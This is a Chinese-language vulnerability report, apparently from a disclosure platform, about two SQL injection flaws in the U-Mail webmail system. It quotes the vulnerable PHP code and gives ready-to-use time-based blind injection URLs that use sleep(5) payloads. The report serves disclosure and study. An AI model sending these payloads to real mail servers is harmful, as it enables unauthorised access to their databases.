### 简要描述: 大牛们都去挖cmseasy了,我却还在挖umail。 ### 详细说明: Sqli 1:\client\mail\module\o_mail.php Line:559 ``` if ( ACTION == "mail-send" ) { ... if ( !$attach_list ) { $attach_list = array( ); } if ( $_FILES ) { ... } $netdisk_files_id = gss( $_POST['nd_select_file'] ); $nd_send_files_id = gss( $_POST['nd_send_file'] ); if ( $nd_send_files_id && $netdisk_files_id ) { $netdisk_files_id = implode( ",", array( $netdisk_files_id, $nd_send_files_id ) ); $netdisk_files_id = $nd_send_files_id; } if ( $netdisk_files_id ) { include_once( LIB_PATH."Netdisk.php" ); $Netdisk = Netdisk::getinstance( ); $netdiskFileArr = $Netdisk->getFileByIDS( $user_id, $netdisk_files_id); //跟踪 ... ``` 看上面的变量netdisk_files_id代入了getFileByIDS方法,跟踪下该方法: ``` public function getFileByIDS( $userid, $netdisk_files_id, $fields = "*", $debug = FALSE ) { $_obfuscate_IRFhnYw = "user_id='".$userid."' AND file_id IN (".$netdisk_files_id.")";//这里的netdisk_files_id未过滤代入了SQL语句,看看注入吧。 $_obfuscate_6RYLWQ = $this->get_file( array( "fields"...
### 简要描述: 大牛们都去挖cmseasy了,我却还在挖umail。 ### 详细说明: Sqli 1:\client\mail\module\o_mail.php Line:559 ``` if ( ACTION == "mail-send" ) { ... if ( !$attach_list ) { $attach_list = array( ); } if ( $_FILES ) { ... } $netdisk_files_id = gss( $_POST['nd_select_file'] ); $nd_send_files_id = gss( $_POST['nd_send_file'] ); if ( $nd_send_files_id && $netdisk_files_id ) { $netdisk_files_id = implode( ",", array( $netdisk_files_id, $nd_send_files_id ) ); $netdisk_files_id = $nd_send_files_id; } if ( $netdisk_files_id ) { include_once( LIB_PATH."Netdisk.php" ); $Netdisk = Netdisk::getinstance( ); $netdiskFileArr = $Netdisk->getFileByIDS( $user_id, $netdisk_files_id); //跟踪 ... ``` 看上面的变量netdisk_files_id代入了getFileByIDS方法,跟踪下该方法: ``` public function getFileByIDS( $userid, $netdisk_files_id, $fields = "*", $debug = FALSE ) { $_obfuscate_IRFhnYw = "user_id='".$userid."' AND file_id IN (".$netdisk_files_id.")";//这里的netdisk_files_id未过滤代入了SQL语句,看看注入吧。 $_obfuscate_6RYLWQ = $this->get_file( array( "fields" => $fields, "where" => $_obfuscate_IRFhnYw, "orderby" => "file_name", "debug" => $debug ) ); return $_obfuscate_6RYLWQ; } ``` 手工先看下是不是存在注入: [<img src="https://images.seebug.org/upload/201409/03183530b4779025468c161c64cb6177620513d7.png" alt="QQ20140903-1@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/03183530b4779025468c161c64cb6177620513d7.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201409/031836596622aed9dd12e81b175e67e06b60146b.png" alt="QQ20140903-2@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/031836596622aed9dd12e81b175e67e06b60146b.png) Sqli 2:(和我发的这个漏洞异曲同工:http://wooyun.org/bugs/wooyun-2010-072963) File:client\oabshare\module\operates.php Line: 235 ``` if ( ACTION == "save-to-pab" ) { ..... ``` 直接给出payload: 1. http://mail.domain.com:8099/webmail/client/oabshare/index.php?module=operate&action=save-to-pab&userlist=1) or if(1=11, 0, sleep(5))%23 因为1!=11,所以会执行后面的sleep(5),执行时间会慢 2. http://mail.domain.com:8099/webmail/client/oabshare/index.php?module=operate&action=save-to-pab&userlist=1) or if(1=1, 0, sleep(5))%23 因为1=1,所以这句执行会很快
